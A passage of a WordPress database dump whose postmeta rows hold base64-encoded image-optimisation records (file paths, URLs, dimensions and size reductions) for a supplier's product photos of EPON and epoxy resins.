vbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tU1UtOC00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tU1UtOC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tU1UtOC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjU5LCJ0aW1lIjoxNDgzNTUyMDQzLCJpZCI6MTkwOH1d'); 
INSERT INTO `wp_postmeta` VALUES (29016, 1907, 'wpfc_optimisation_reduction', '20684'); 
INSERT INTO `wp_postmeta` VALUES (29017, 1907, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MjA0OCwiaWQiOiIxOTA3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tNTgwMDUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc2NSwidGltZSI6MTQ4MzU1MjA1MSwiaWQiOjE5MDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNjY0LCJ0aW1lIjoxNDgzNTUyMDU1LCJpZCI6MTkwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tNTgwMDUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIzNzUsInRpbWUiOjE0ODM1NTIwNTgsImlkIjoxOTA3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi01ODAwNS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDUyMywidGltZSI6MTQ4MzU1MjA2MiwiaWQiOjE5MDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NjEsInRpbWUiOjE0ODM1NTIwNjYsImlkIjoxOTA3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi01ODAwNS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ4LCJ0aW1lIjoxNDgzNTUyMDY5LCJpZCI6MTkwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tNTgwMDUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwNiwidGltZSI6MTQ4MzU1MjA3MiwiaWQiOjE5MDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi01ODAwNS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDQ0LCJ0aW1lIjoxNDgzNTUyMDc2LCJpZCI6MTkwN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi01ODAwNS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTkyLCJ0aW1lIjoxNDgzNTUyMDc5LCJpZCI6MTkwN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tNTgwMDUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTU4MDA1LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi01ODAwNS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODA2LCJ0aW1lIjoxNDgzNTUyMDgyLCJpZCI6MTkwN31d'); 
INSERT INTO `wp_postmeta` VALUES (29018, 1906, 'wpfc_optimisation_reduction', '19761'); 
INSERT INTO `wp_postmeta` VALUES (29019, 1906, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTIwODcsImlkIjoiMTkwNiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NzUsInRpbWUiOjE0ODM1NTIwOTAsImlkIjoxOTA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjU3MywidGltZSI6MTQ4MzU1MjA5MywiaWQiOjE5MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgxLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyMzQzLCJ0aW1lIjoxNDgzNTUyMDk3LCJpZCI6MTkwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyODEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6OTQyOSwidGltZSI6MTQ4MzU1MjEwMiwiaWQiOjE5MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1OTMsInRpbWUiOjE0ODM1NTIxMDUsImlkIjoxOTA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4MS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTE4LCJ0aW1lIjoxNDgzNTUyMTA5LCJpZCI6MTkwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyODEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyODEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU3MywidGltZSI6MTQ4MzU1MjExMiwiaWQiOjE5MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjgxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjgxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNTAwLCJ0aW1lIjoxNDgzNTUyMTE2LCJpZCI6MTkwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4MS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTY0LCJ0aW1lIjoxNDgzNTUyMTE5LCJpZCI6MTkwNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI4MS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI4MS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzkzLCJ0aW1lIjoxNDgzNTUyMTIyLCJpZCI6MTkwNn1d'); 
INSERT INTO `wp_postmeta` VALUES (29020, 1905, 'wpfc_optimisation_reduction', '1846657'); 
INSERT INTO `wp_postmeta` VALUES (29021, 1905, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLmpwZyIsIndpZHRoIjo1NjI2LCJoZWlnaHQiOjM0NTMsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMuanBnIiwicmVkdWN0aW9uIjoxODQ2NjQ3LCJ0aW1lIjoxNDgzNTUyMTM0LCJpZCI6IjE5MDUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MjEzNiwiaWQiOjE5MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTgwMHg0OTEuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo0OTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTgwMHg0OTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTgwMHg0OTEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUyMTQwLCJpZCI6MTkwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtNzY4eDQ3MS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQ3MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtNzY4eDQ3MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1yZXNpbi1zeXRlbXMtNzY4eDQ3MS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTIxNDMsImlkIjoxOTA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0xNjAweDk4Mi5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0Ijo5ODIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktcmVzaW4tc3l0ZW1zLTE2MDB4OTgyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXJlc2luLXN5dGVtcy0xNjAweDk4Mi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTIxNDYsI